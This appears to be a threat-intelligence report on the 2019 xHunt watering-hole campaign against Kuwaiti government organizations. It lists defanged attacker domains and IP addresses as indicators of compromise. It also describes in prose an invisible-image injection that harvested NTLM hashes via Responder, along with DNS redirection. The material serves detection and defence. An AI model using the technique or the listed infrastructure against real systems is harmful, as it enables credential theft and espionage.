Shades of OilRig and Chafer in xHunt Campaign's Attack on Kuwaiti Government Sector
- Actor Motivations: Espionage,Exfiltration
- Attack Vectors: Code injection,Compromised Credentials,DNS spoofing
- Attack Complexity: Medium
- Threat Risk: High Impact/High Probability
Threat Overview
The xHunt Campaign targeted government organizations in Kuwait, compromising a website to create a watering hole. Between May and December 2019, the threat actors injected HTML code to harvest NTLM hashes from visitors, potentially allowing them to infiltrate organizations undetected, steal sensitive information, and even implement backdoors for future access. Concurrent DNS redirect activity was observed, implying an interest in user credential harvesting. The attack involved use of the Responder tool and was linked with previous xHunt activities, including the Hisoka campaign. Intriguingly, some of the infrastructure used in the attack showed overlaps with the activity of known threat groups, OilRig and Chafer.
Detected Targets
| Type | Description | Confidence |
|---|---|---|
| Sector | Government Agencies and Services The sector targeted by the attack included a Kuwait government organization. | Verified |
| Region | Kuwait The country targeted by the attack was Kuwait. | Verified |
Extracted IOCs
- 6google[.]com
- alforatsystem[.]com
- antivirus-update[.]top
- cloudipnameserver[.]com
- ffconnectivitycheck[.]com
- firewallsupports[.]com
- googie[.]email
- google-update[.]com
- lowconnectivity[.]com
- microsofte-update[.]com
- sakabota[.]com
- zombsroyale[.]io
- 104[.]168.136.161
- 104[.]168.244.213
- 185[.]15.247.140
- 185[.]161.209.147
- 185[.]161.211.72
- 185[.]161.211.73
- 185[.]161.211.74
- 185[.]161.211.75
- 185[.]161.211.76
- 185[.]161.211.77
- 185[.]161.211.78
- 185[.]161.211.79
- 185[.]161.211.86
- 185[.]174.101.66
- 185[.]174.101.68
- 192[.]99.138.4
- 192[.]99.138.6
- 199[.]247.3.186
- 199[.]247.3.187
- 199[.]247.3.188
- 199[.]247.3.189
- 199[.]247.3.190
- 199[.]247.3.191
- 199[.]247.3.192
- 199[.]247.3.193
- 199[.]247.3.194
- 199[.]247.3.195
- 199[.]247.3.196
- 199[.]247.3.197
- 199[.]247.3.198
- 213[.]202.217.0
- 213[.]202.217.1
- 213[.]202.217.10
- 213[.]202.217.11
- 213[.]202.217.12
- 213[.]202.217.13
- 213[.]202.217.14
- 213[.]202.217.15
- 213[.]202.217.16
- 213[.]202.217.17
- 213[.]202.217.18
- 213[.]202.217.19
- 213[.]202.217.2
- 213[.]202.217.20
- 213[.]202.217.21
- 213[.]202.217.22
- 213[.]202.217.3
- 213[.]202.217.31
- 213[.]202.217.4
- 213[.]202.217.5
- 213[.]202.217.6
- 213[.]202.217.7
- 213[.]202.217.8
- 213[.]202.217.9
- 91[.]132.139.183
- 91[.]132.139.200
Tip: 68 related IOCs (56 IP, 12 domain, 0 URL, 0 email, 0 file hash) to this threat have been found.
Overlaps
Source: Palo Alto Network - October 2019
Detection (one case): firewallsupports[.]com
Source: Palo Alto Network - September 2019
Detection (10 cases): 185[.]15.247.140, 213[.]202.217.4, 213[.]202.217.9, 91[.]132.139.183, 6google[.]com, alforatsystem[.]com, firewallsupports[.]com, googie[.]email, google-update[.]com, sakabota[.]com
Source: Cyware - August 2019
Detection (three cases): 185[.]15.247.140, 185[.]161.211.86, 213[.]202.217.9
Source: CrowdStrike - January 2019
Detection (four cases): 185[.]15.247.140, 185[.]161.209.147, 199[.]247.3.191, cloudipnameserver[.]com
Source: Openminded - January 2019
Detection (two cases): 185[.]161.211.72, 185[.]161.211.79
Source: Cisco Talos - November 2018
Detection (one case): 185[.]161.211.72
Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.
FAQs
xHunt Campaign and Kuwait Watering Hole Attacks
Hackers compromised a legitimate Kuwait government website and inserted hidden code designed to silently steal the login credentials of anyone who visited the page. During the same timeframe, the attackers also manipulated the internet routing for several organizations to redirect legitimate web traffic to servers they controlled.
The attack is attributed to the operators of the "xHunt" campaign, specifically using tools and servers associated with their "Hisoka" and "Sakabota" operations. Some of the network infrastructure used in these attacks also shares historical connections with other known cyber threat groups, such as OilRig and Chafer.
The primary goal was to harvest user login information, specifically account names and encrypted passwords. By capturing this data, the attackers aimed to crack the passwords or use the stolen credentials to breach organizations, steal sensitive information, and establish long-term access without being detected.
Yes, these specific attacks were highly targeted at government and private sector organizations in Kuwait. The attackers also heavily focused on capturing login credentials related to organizational email servers.
The attackers injected an invisible image into a trusted website. When a user visited the site, the hidden code tricked the user's computer into automatically sending its network login credentials to a hacker-controlled server. Additionally, they altered DNS settings, the internet's address book—to reroute organizational web and email traffic to deceptive servers.
Government and major private sector organizations hold highly sensitive communications, intellectual property, and citizen data. Gaining trusted access through stolen employee credentials allows attackers to navigate these valuable networks freely and spy on internal operations.
Organizations should block internal computer networking protocols from communicating with the outside internet to stop this specific type of credential theft. It is also crucial to continuously monitor website code for unauthorized changes and watch for unexpected shifts in internet domain routing.
This is a highly targeted issue. The specific watering hole and internet routing attacks detailed in this report were aimed directly at government and private organizations in Kuwait, rather than the general public.